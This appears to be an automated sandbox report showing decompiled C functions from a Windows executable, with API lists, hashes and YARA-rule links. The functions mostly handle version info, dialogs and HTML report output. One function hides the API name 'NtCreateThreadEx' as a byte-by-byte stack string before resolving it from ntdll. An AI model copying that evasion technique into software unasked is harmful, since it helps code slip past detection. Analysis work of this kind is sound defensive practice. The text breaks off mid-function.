                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: FileInfoQueryValueVersion$??2@??3@Size_snwprintfwcscpy
                                                                                                                    • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                                    • API String ID: 1223191525-1542517562
                                                                                                                    • Opcode ID: 7d0a25dbe63dd51685ec4fd467e5617a4705a8ce8e8c15efb6301eb2ec3eaad9
                                                                                                                    • Instruction ID: 283451b663653e95218ba9e6ce5340ec929c4f2fba7a9b8c11281d5ea0e9195a
                                                                                                                    • Opcode Fuzzy Hash: 7d0a25dbe63dd51685ec4fd467e5617a4705a8ce8e8c15efb6301eb2ec3eaad9
                                                                                                                    • Instruction Fuzzy Hash: E34144B2940219BAC704EBA5DD41DDEB7BDEF08704F100177B905B3181DB78AA59CBD8
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0040A1EF, Relevance: 33.3, APIs: 2, Strings: 17, Instructions: 47libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 76%
                                                                                                                    			E0040A1EF(struct HINSTANCE__** __esi) {
				char _v8;
				char _v9;
				char _v10;
				char _v11;
				char _v12;
				char _v13;
				char _v14;
				char _v15;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				char _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				struct HINSTANCE__* _t27;

				if( *__esi != 0) {
					L3:
					return 1;
				}
				_t27 = LoadLibraryW(L"ntdll.dll");
				 *__esi = _t27;
				if(_t27 != 0) {
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosw");
					asm("stosb");
					_v24 = 0x4e;
					_v23 = 0x74;
					_v13 = 0x65;
					_v12 = 0x61;
					_v18 = 0x74;
					_v17 = 0x65;
					_v22 = 0x43;
					_v14 = 0x72;
					_v11 = 0x64;
					_v21 = 0x72;
					_v10 = 0x45;
					_v9 = 0x78;
					_v20 = 0x65;
					_v19 = 0x61;
					_v16 = 0x54;
					_v15 = 0x68;
					_v8 = 0;
					__esi[1] = GetProcAddress(_t27,  &_v24);
					goto L3;
				}
				return 0;
			}





















                                                                                                                    0x0040a1f8
                                                                                                                    0x0040a26d
                                                                                                                    0x00000000
                                                                                                                    0x0040a26f
                                                                                                                    0x0040a205
                                                                                                                    0x0040a20b
                                                                                                                    0x0040a20d
                                                                                                                    0x0040a213
                                                                                                                    0x0040a214
                                                                                                                    0x0040a215
                                                                                                                    0x0040a216
                                                                                                                    0x0040a217
                                                                                                                    0x0040a219
                                                                                                                    0x0040a21f
                                                                                                                    0x0040a223
                                                                                                                    0x0040a227
                                                                                                                    0x0040a22b
                                                                                                                    0x0040a22f
                                                                                                                    0x0040a233
                                                                                                                    0x0040a237
                                                                                                                    0x0040a23b
                                                                                                                    0x0040a23f
                                                                                                                    0x0040a243
                                                                                                                    0x0040a247
                                                                                                                    0x0040a24b
                                                                                                                    0x0040a24f
                                                                                                                    0x0040a253
                                                                                                                    0x0040a257
                                                                                                                    0x0040a25b
                                                                                                                    0x0040a25f
                                                                                                                    0x0040a269
                                                                                                                    0x00000000
                                                                                                                    0x0040a26c
                                                                                                                    0x0040a271

                                                                                                                    APIs
                                                                                                                    • LoadLibraryW.KERNEL32(ntdll.dll,?,?,?,?,0040A2A4), ref: 0040A1FF
                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0040A263
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                    • String ID: C$E$N$T$a$a$d$e$e$e$h$ntdll.dll$r$r$t$t$x
                                                                                                                    • API String ID: 2574300362-1257427173
                                                                                                                    • Opcode ID: 7c4b767998ad850fb5a7cf24f594afd5e084a11fa120f3cae330cd392d2e2909
                                                                                                                    • Instruction ID: 28a3addb3bc40b583479f690f9d6e65064931713b616a12c977b5f47a4008353
                                                                                                                    • Opcode Fuzzy Hash: 7c4b767998ad850fb5a7cf24f594afd5e084a11fa120f3cae330cd392d2e2909
                                                                                                                    • Instruction Fuzzy Hash: 08110A2090C6C9EDEB12C7FCC40879EBEF15B26709F0881ECC585B6292C6BA5758C776
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00407F8D, Relevance: 33.1, APIs: 22, Instructions: 137windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 63%
                                                                                                                    			E00407F8D(void* __eax) {
				struct _SHFILEINFOW _v692;
				void _v1214;
				short _v1216;
				void* _v1244;
				void* _v1248;
				void* _v1252;
				void* _v1256;
				void* _v1268;
				void* _t37;
				long _t38;
				long _t46;
				long _t48;
				long _t58;
				void* _t62;
				intOrPtr* _t64;

				_t64 = ImageList_Create;
				_t62 = __eax;
				if( *((intOrPtr*)(__eax + 0x2b4)) != 0) {
					if( *((intOrPtr*)(__eax + 0x2bc)) == 0) {
						_t48 = ImageList_Create(0x10, 0x10, 0x19, 1, 1);
						 *(_t62 + 0x2a8) = _t48;
						__imp__ImageList_SetImageCount(_t48, 0);
						_push( *(_t62 + 0x2a8));
					} else {
						_v692.hIcon = 0;
						memset( &(_v692.iIcon), 0, 0x2b0);
						_v1216 = 0;
						memset( &_v1214, 0, 0x208);
						GetWindowsDirectoryW( &_v1216, 0x104);
						_t58 = SHGetFileInfoW( &_v1216, 0,  &_v692, 0x2b4, 0x4001);
						 *(_t62 + 0x2a8) = _t58;
						_push(_t58);
					}
					SendMessageW( *(_t62 + 0x2a0), 0x1003, 1, ??);
				}
				if( *((intOrPtr*)(_t62 + 0x2b8)) != 0) {
					_t46 =  *_t64(0x20, 0x20, 0x19, 1, 1);
					 *(_t62 + 0x2ac) = _t46;
					__imp__ImageList_SetImageCount(_t46, 0);
					SendMessageW( *(_t62 + 0x2a0), 0x1003, 0,  *(_t62 + 0x2ac));
				}
				 *(_t62 + 0x2a4) =  *_t64(0x10, 0x10, 0x19, 1, 1);
				_v1248 = LoadImageW(GetModuleHandleW(0), 0x85, 0, 0x10, 0x10, 0x1000);
				_t37 = LoadImageW(GetModuleHandleW(0), 0x86, 0, 0x10, 0x10, 0x1000);
				_v1244 = _t37;
				__imp__ImageList_SetImageCount( *(_t62 + 0x2a4), 0);
				_t38 = GetSysColor(0xf);
				_v1248 = _t38;
				ImageList_AddMasked( *(_t62 + 0x2a4), _v1256, _t38);
				ImageList_AddMasked( *(_t62 + 0x2a4), _v1252, _v1248);
				DeleteObject(_v1268);
				DeleteObject(_v1268);
				return SendMessageW(E0040331D( *(_t62 + 0x2a0)), 0x1208, 0,  *(_t62 + 0x2a4));
			}


















                                                                                                                    0x00407f9b
                                                                                                                    0x00407fa3
                                                                                                                    0x00407fad
                                                                                                                    0x00407fb9
                                                                                                                    0x0040802e
                                                                                                                    0x00408032
                                                                                                                    0x00408038
                                                                                                                    0x0040803e
                                                                                                                    0x00407fbb
                                                                                                                    0x00407fc9
                                                                                                                    0x00407fd0
                                                                                                                    0x00407fe0
                                                                                                                    0x00407fe5
                                                                                                                    0x00407ff7
                                                                                                                    0x00408015
                                                                                                                    0x0040801b
                                                                                                                    0x00408021
                                                                                                                    0x00408021
                                                                                                                    0x00408051
                                                                                                                    0x00408051
                                                                                                                    0x00408059
                                                                                                                    0x00408065
                                                                                                                    0x00408069
                                                                                                                    0x0040806f
                                                                                                                    0x00408087
                                                                                                                    0x00408087
                                                                                                                    0x0040809c
                                                                                                                    0x004080bb
                                                                                                                    0x004080d1
                                                                                                                    0x004080de
                                                                                                                    0x004080e2
                                                                                                                    0x004080ea
                                                                                                                    0x004080fb
                                                                                                                    0x00408105
                                                                                                                    0x00408115
                                                                                                                    0x00408121
                                                                                                                    0x00408127
                                                                                                                    0x00408150

                                                                                                                    APIs
                                                                                                                    • memset.MSVCRT ref: 00407FD0
                                                                                                                    • memset.MSVCRT ref: 00407FE5
                                                                                                                    • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00407FF7
                                                                                                                    • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 00408015
                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 0040802E
                                                                                                                    • ImageList_SetImageCount.COMCTL32(00000000,00000000), ref: 00408038
                                                                                                                    • SendMessageW.USER32(?,00001003,00000001,?), ref: 00408051
                                                                                                                    • ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 00408065
                                                                                                                    • ImageList_SetImageCount.COMCTL32(00000000,00000000), ref: 0040806F
                                                                                                                    • SendMessageW.USER32(?,00001003,00000000,?), ref: 00408087
                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 00408093
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004080A2
                                                                                                                    • LoadImageW.USER32 ref: 004080B4
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004080BF
                                                                                                                    • LoadImageW.USER32 ref: 004080D1
                                                                                                                    • ImageList_SetImageCount.COMCTL32(?,00000000), ref: 004080E2
                                                                                                                    • GetSysColor.USER32(0000000F), ref: 004080EA
                                                                                                                    • ImageList_AddMasked.COMCTL32(?,00000000,00000000), ref: 00408105
                                                                                                                    • ImageList_AddMasked.COMCTL32(?,?,?), ref: 00408115
                                                                                                                    • DeleteObject.GDI32(?), ref: 00408121
                                                                                                                    • DeleteObject.GDI32(?), ref: 00408127
                                                                                                                    • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 00408144
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: Image$List_$CountCreateMessageSend$DeleteHandleLoadMaskedModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 304928396-0
                                                                                                                    • Opcode ID: d4ab9f05862d1af7c7dd0e0dd7fd39e91fe05cdd650fdb134c44776c28691368
                                                                                                                    • Instruction ID: fc02d650de5297a4f4a3b2912da131a5170d4a501b91b7a2a94f7b4638737e48
                                                                                                                    • Opcode Fuzzy Hash: d4ab9f05862d1af7c7dd0e0dd7fd39e91fe05cdd650fdb134c44776c28691368
                                                                                                                    • Instruction Fuzzy Hash: 8F418971640304FFE6306B61DD8AF977BACFF89B00F00092DB795A51D1DAB55450DB29
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0040AE90, Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 103COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 69%
                                                                                                                    			E0040AE90(void* __esi, wchar_t* _a4, wchar_t* _a8) {
				int _v8;
				void _v518;
				long _v520;
				void _v1030;
				char _v1032;
				intOrPtr _t32;
				wchar_t* _t57;
				void* _t58;
				void* _t59;
				void* _t60;

				_t58 = __esi;
				_v520 = 0;
				memset( &_v518, 0, 0x1fc);
				_v1032 = 0;
				memset( &_v1030, 0, 0x1fc);
				_t60 = _t59 + 0x18;
				_v8 = 1;
				if( *((intOrPtr*)(__esi + 4)) == 0xffffffff &&  *((intOrPtr*)(__esi + 8)) <= 0) {
					_v8 = 0;
				}
				_t57 = _a4;
				 *_t57 = 0;
				if(_v8 != 0) {
					wcscpy(_t57, L"<font");
					_t32 =  *((intOrPtr*)(_t58 + 8));
					if(_t32 > 0) {
						_push(_t32);
						_push(L" size=\"%d\"");
						_push(0xff);
						_push( &_v520);
						L0040B1EC();
						wcscat(_t57,  &_v520);
						_t60 = _t60 + 0x18;
					}
					_t33 =  *((intOrPtr*)(_t58 + 4));
					if( *((intOrPtr*)(_t58 + 4)) != 0xffffffff) {
						_push(E0040ADC0(_t33,  &_v1032));
						_push(L" color=\"#%s\"");
						_push(0xff);
						_push( &_v520);
						L0040B1EC();
						wcscat(_t57,  &_v520);
					}
					wcscat(_t57, ">");
				}
				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
					wcscat(_t57, L"<b>");
				}
				wcscat(_t57, _a8);
				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
					wcscat(_t57, L"</b>");
				}
				if(_v8 != 0) {
					wcscat(_t57, L"</font>");
				}
				return _t57;
			}













                                                                                                                    0x0040ae90
                                                                                                                    0x0040aeab
                                                                                                                    0x0040aeb2
                                                                                                                    0x0040aec0
                                                                                                                    0x0040aec7
                                                                                                                    0x0040aecc
                                                                                                                    0x0040aed3
                                                                                                                    0x0040aeda
                                                                                                                    0x0040aee1
                                                                                                                    0x0040aee1
                                                                                                                    0x0040aee7
                                                                                                                    0x0040aeea
                                                                                                                    0x0040aeed
                                                                                                                    0x0040aef9
                                                                                                                    0x0040aefe
                                                                                                                    0x0040af05
                                                                                                                    0x0040af07
                                                                                                                    0x0040af08
                                                                                                                    0x0040af13
                                                                                                                    0x0040af18
                                                                                                                    0x0040af19
                                                                                                                    0x0040af26
                                                                                                                    0x0040af2b
                                                                                                                    0x0040af2b
                                                                                                                    0x0040af2e
                                                                                                                    0x0040af34
                                                                                                                    0x0040af43
                                                                                                                    0x0040af44
                                                                                                                    0x0040af4f
                                                                                                                    0x0040af54
                                                                                                                    0x0040af55
                                                                                                                    0x0040af62
                                                                                                                    0x0040af67
                                                                                                                    0x0040af70
                                                                                                                    0x0040af76
                                                                                                                    0x0040af7a
                                                                                                                    0x0040af82
                                                                                                                    0x0040af88
                                                                                                                    0x0040af8d
                                                                                                                    0x0040af97
                                                                                                                    0x0040af9f
                                                                                                                    0x0040afa5
                                                                                                                    0x0040afa9
                                                                                                                    0x0040afb1
                                                                                                                    0x0040afb7
                                                                                                                    0x0040afbd

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                                                    • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                    • API String ID: 3143752011-1996832678
                                                                                                                    • Opcode ID: 330f77f369881cb7aaffb2d4d29cef926f955dd174757b27785871b236def110
                                                                                                                    • Instruction ID: 2e7f7f44a8c08f278b605cd2082ab28bfbf3198b566a778c3f72e8233e5ba29a
                                                                                                                    • Opcode Fuzzy Hash: 330f77f369881cb7aaffb2d4d29cef926f955dd174757b27785871b236def110
                                                                                                                    • Instruction Fuzzy Hash: 2531C6B2904306A9D720EAA59D86E7E73BCDF40714F10807FF214B61C2DB7C9944D69D
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00403C03, Relevance: 30.2, APIs: 20, Instructions: 235windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 97%
                                                                                                                    			E00403C03(void* __eflags) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* _t88;
				void* _t108;
				void* _t113;
				void* _t119;
				void* _t121;
				void* _t122;
				void* _t123;
				intOrPtr* _t124;
				void* _t134;

				_t113 = _t108;
				E00403B3C(_t113);
				E00403B16(_t113);
				DragAcceptFiles( *(_t113 + 0x10), 1);
				 *0x40f2f0 = SetWindowLongW(GetDlgItem( *(_t113 + 0x10), 0x3fd), 0xfffffffc, E00403A73);
				E00402DDD( *(_t113 + 0x10), _t113 + 0x40);
				 *(_t124 + 0x14) = LoadImageW(GetModuleHandleW(0), 0x65, 1, 0x10, 0x10, 0);
				 *((intOrPtr*)(_t124 + 0x24)) = LoadImageW(GetModuleHandleW(0), 0x65, 1, 0x20, 0x20, 0);
				SendMessageW( *(_t113 + 0x10), 0x80, 0,  *(_t124 + 0x10));
				SendMessageW( *(_t113 + 0x10), 0x80, 1,  *(_t124 + 0x14));
				E0040AD85(GetDlgItem( *(_t113 + 0x10), 0x402));
				 *_t124 = 0x3ea;
				E0040AD85(GetDlgItem(??, ??));
				 *_t124 = 0x3f1;
				_t116 = GetDlgItem( *(_t113 + 0x10),  *(_t113 + 0x10));
				E004049D9(_t49, E00405B81(0x259), 0x20);
				E004049D9(_t49, E00405B81(0x25a), 0x40);
				E004049D9(_t116, E00405B81(0x25b), 0x80);
				E004049D9(_t116, E00405B81(0x25c), 0x100);
				E004049D9(_t116, E00405B81(0x25d), 0x4000);
				E004049D9(_t116, E00405B81(0x25e), 0x8000);
				_t117 = GetDlgItem( *(_t113 + 0x10), 0x3f5);
				E004049D9(_t62, E00405B81(0x26c), 0);
				E004049D9(_t62, E00405B81(0x26d), 1);
				E004049D9(_t117, E00405B81(0x26e), 2);
				E004049D9(_t117, E00405B81(0x26f), 3);
				_t134 = _t124 + 0x78;
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x400);
				_t119 = 1;
				do {
					_t17 = _t119 + 0x280; // 0x281
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t17), _t119);
					_t134 = _t134 + 0xc;
					_t119 = _t119 + 1;
				} while (_t119 <= 9);
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x3fc);
				_t121 = 1;
				do {
					_t21 = _t121 + 0x294; // 0x295
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t21), _t121);
					_t134 = _t134 + 0xc;
					_t121 = _t121 + 1;
				} while (_t121 <= 3);
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x407);
				_t122 = 0;
				do {
					_t25 = _t122 + 0x2bc; // 0x2bc
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t25), _t122);
					_t134 = _t134 + 0xc;
					_t122 = _t122 + 1;
				} while (_t122 <= 0xd);
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x40c);
				_t123 = 0;
				do {
					_t29 = _t123 + 0x2ee; // 0x2ee
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t29), _t123);
					_t134 = _t134 + 0xc;
					_t123 = _t123 + 1;
					_t143 = _t123 - 3;
				} while (_t123 < 3);
				SendDlgItemMessageW( *(_t113 + 0x10), 0x3fd, 0xc5, 0, 0);
				E00403EC3(GetDlgItem, _t113);
				SetFocus(GetDlgItem( *(_t113 + 0x10), 0x402));
				_t88 = E00402D78(_t113, _t143);
				E00402BEE(_t113);
				return _t88;
			}
















                                                                                                                    0x00403c09
                                                                                                                    0x00403c0c
                                                                                                                    0x00403c11
                                                                                                                    0x00403c1b
                                                                                                                    0x00403c3f
                                                                                                                    0x00403c4a
                                                                                                                    0x00403c6e
                                                                                                                    0x00403c96
                                                                                                                    0x00403c9a
                                                                                                                    0x00403ca6
                                                                                                                    0x00403cb3
                                                                                                                    0x00403cb8
                                                                                                                    0x00403cc5
                                                                                                                    0x00403cca
                                                                                                                    0x00403cdd
                                                                                                                    0x00403ce6
                                                                                                                    0x00403cf8
                                                                                                                    0x00403d11
                                                                                                                    0x00403d26
                                                                                                                    0x00403d3f
                                                                                                                    0x00403d54
                                                                                                                    0x00403d6d
                                                                                                                    0x00403d76
                                                                                                                    0x00403d88
                                                                                                                    0x00403d9e
                                                                                                                    0x00403db0
                                                                                                                    0x00403db5
                                                                                                                    0x00403dc4
                                                                                                                    0x00403dc8
                                                                                                                    0x00403dc9
                                                                                                                    0x00403dca
                                                                                                                    0x00403dda
                                                                                                                    0x00403ddf
                                                                                                                    0x00403de2
                                                                                                                    0x00403de3
                                                                                                                    0x00403df4
                                                                                                                    0x00403df8
                                                                                                                    0x00403df9
                                                                                                                    0x00403dfa
                                                                                                                    0x00403e0a
                                                                                                                    0x00403e0f
                                                                                                                    0x00403e12
                                                                                                                    0x00403e13
                                                                                                                    0x00403e22
                                                                                                                    0x00403e26
                                                                                                                    0x00403e28
                                                                                                                    0x00403e29
                                                                                                                    0x00403e39
                                                                                                                    0x00403e3e
                                                                                                                    0x00403e41
                                                                                                                    0x00403e42
                                                                                                                    0x00403e51
                                                                                                                    0x00403e55
                                                                                                                    0x00403e57
                                                                                                                    0x00403e58
                                                                                                                    0x00403e68
                                                                                                                    0x00403e6d
                                                                                                                    0x00403e70
                                                                                                                    0x00403e71
                                                                                                                    0x00403e71
                                                                                                                    0x00403e87
                                                                                                                    0x00403e8d
                                                                                                                    0x00403e9e
                                                                                                                    0x00403ea6
                                                                                                                    0x00403eaf
                                                                                                                    0x00403ebc

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00403B3C: memset.MSVCRT ref: 00403B5D
                                                                                                                      • Part of subcall function 00403B3C: memset.MSVCRT ref: 00403B76
                                                                                                                      • Part of subcall function 00403B3C: _snwprintf.MSVCRT ref: 00403B9F
                                                                                                                      • Part of subcall function 00403B16: SetDlgItemTextW.USER32 ref: 00403B34
                                                                                                                    • DragAcceptFiles.SHELL32(?,00000001), ref: 00403C1B
                                                                                                                    • GetDlgItem.USER32 ref: 00403C2F
                                                                                                                    • SetWindowLongW.USER32 ref: 00403C39
                                                                                                                      • Part of subcall function 00402DDD: GetClientRect.USER32 ref: 00402DEF
                                                                                                                      • Part of subcall function 00402DDD: GetWindow.USER32(?,00000005), ref: 00402E07
                                                                                                                      • Part of subcall function 00402DDD: GetWindow.USER32(00000000), ref: 00402E0A
                                                                                                                      • Part of subcall function 00402DDD: GetWindow.USER32(00000000,00000002), ref: 00402E16
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00403C57
                                                                                                                    • LoadImageW.USER32 ref: 00403C6A
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00403C72
                                                                                                                    • LoadImageW.USER32 ref: 00403C7F
                                                                                                                    • SendMessageW.USER32(?,00000080,00000000,?), ref: 00403C9A
                                                                                                                    • SendMessageW.USER32(?,00000080,00000001,?), ref: 00403CA6
                                                                                                                    • GetDlgItem.USER32 ref: 00403CB0
                                                                                                                      • Part of subcall function 0040AD85: GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 0040AD9D
                                                                                                                      • Part of subcall function 0040AD85: FreeLibrary.KERNEL32(00000000,?,00403CB8,00000000), ref: 0040ADB5
                                                                                                                    • GetDlgItem.USER32 ref: 00403CC2
                                                                                                                    • GetDlgItem.USER32 ref: 00403CD4
                                                                                                                      • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                                                      • Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                                                      • Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99
                                                                                                                      • Part of subcall function 004049D9: SendMessageW.USER32(?,00000143,00000000,?), ref: 004049F0
                                                                                                                      • Part of subcall function 004049D9: SendMessageW.USER32(?,00000151,00000000,?), ref: 00404A02
                                                                                                                      • Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
                                                                                                                      • Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
                                                                                                                      • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                                                    • GetDlgItem.USER32 ref: 00403D64
                                                                                                                    • GetDlgItem.USER32 ref: 00403DC0
                                                                                                                    • GetDlgItem.USER32 ref: 00403DF0
                                                                                                                    • GetDlgItem.USER32 ref: 00403E20
                                                                                                                    • GetDlgItem.USER32 ref: 00403E4F
                                                                                                                    • SendDlgItemMessageW.USER32 ref: 00403E87
                                                                                                                    • GetDlgItem.USER32 ref: 00403E9B
                                                                                                                    • SetFocus.USER32(00000000), ref: 00403E9E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: Item$MessageSend$HandleModuleWindow$Load$Imagememset$AcceptAddressClientDragFilesFocusFreeLibraryLongProcRectStringText_snwprintfmemcpywcscpywcslen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1038210931-0
                                                                                                                    • Opcode ID: 480d4766e6d8641b1262395da53219e72a248241b0e6c98f945c6f60a0780f3c
                                                                                                                    • Instruction ID: 1ad7597cb923a57af30b7376ae6fce15a7391ca9e5b6ac25faa2013acf12c195
                                                                                                                    • Opcode Fuzzy Hash: 480d4766e6d8641b1262395da53219e72a248241b0e6c98f945c6f60a0780f3c
                                                                                                                    • Instruction Fuzzy Hash: D261A6B09407087FE6207F71DC47F2B7A6CEF40714F000A3ABB46751D3DABA69158A59
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00407763, Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 185COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 56%
                                                                                                                    			E00407763(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void _v138;
				long _v140;
				void _v242;
				char _v244;
				void _v346;
				char _v348;
				void _v452;
				void _v962;
				signed short _v964;
				void* __esi;
				void* _t87;
				wchar_t* _t109;
				intOrPtr* _t124;
				signed int _t125;
				signed int _t140;
				signed int _t153;
				intOrPtr* _t154;
				signed int _t156;
				signed int _t157;
				void* _t159;
				void* _t161;

				_t124 = __ebx;
				_v964 = _v964 & 0x00000000;
				memset( &_v962, 0, 0x1fc);
				_t125 = 0x18;
				memcpy( &_v452, L"<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s\r\n", _t125 << 2);
				asm("movsw");
				_t153 = 0;
				_v244 = 0;
				memset( &_v242, 0, 0x62);
				_v348 = 0;
				memset( &_v346, 0, 0x62);
				_v140 = 0;
				memset( &_v138, 0, 0x62);
				_t161 = _t159 + 0x3c;
				_t87 =  *((intOrPtr*)( *__ebx + 0x14))();
				_v16 =  *((intOrPtr*)(__ebx + 0x2d4));
				if(_t87 != 0xffffffff) {
					_push(E0040ADC0(_t87,  &_v964));
					_push(L" bgcolor=\"%s\"");
					_push(0x32);
					_push( &_v244);
					L0040B1EC();
					_t161 = _t161 + 0x18;
				}
				E00407343(_t124, _a4, L"<table border=\"1\" cellpadding=\"5\">\r\n");
				_v8 = _t153;
				if( *((intOrPtr*)(_t124 + 0x2c)) > _t153) {
					while(1) {
						_t156 =  *( *((intOrPtr*)(_t124 + 0x30)) + _v8 * 4);
						_v12 = _t156;
						_t157 = _t156 * 0x14;
						if( *((intOrPtr*)(_t157 +  *((intOrPtr*)(_t124 + 0x40)) + 8)) != _t153) {
							wcscpy( &_v140, L" nowrap");
						}
						_v32 = _v32 | 0xffffffff;
						_v28 = _v28 | 0xffffffff;
						_v24 = _v24 | 0xffffffff;
						_v20 = _t153;
						_t154 = _a8;
						 *((intOrPtr*)( *_t124 + 0x34))(6, _v8, _t154,  &_v32);
						E0040ADC0(_v32,  &_v348);
						E0040ADF1( *((intOrPtr*)( *_t154))(_v12,  *((intOrPtr*)(_t124 + 0x60))),  *(_t124 + 0x64));
						 *((intOrPtr*)( *_t124 + 0x50))( *(_t124 + 0x64), _t154, _v12);
						if( *((intOrPtr*)( *_t124 + 0x18))() == 0xffffffff) {
							wcscpy( *(_t124 + 0x68),  *(_t157 + _v16 + 0x10));
						} else {
							_push( *(_t157 + _v16 + 0x10));
							_push(E0040ADC0(_t106,  &_v964));
							_push(L"<font color=\"%s\">%s</font>");
							_push(0x2000);
							_push( *(_t124 + 0x68));
							L0040B1EC();
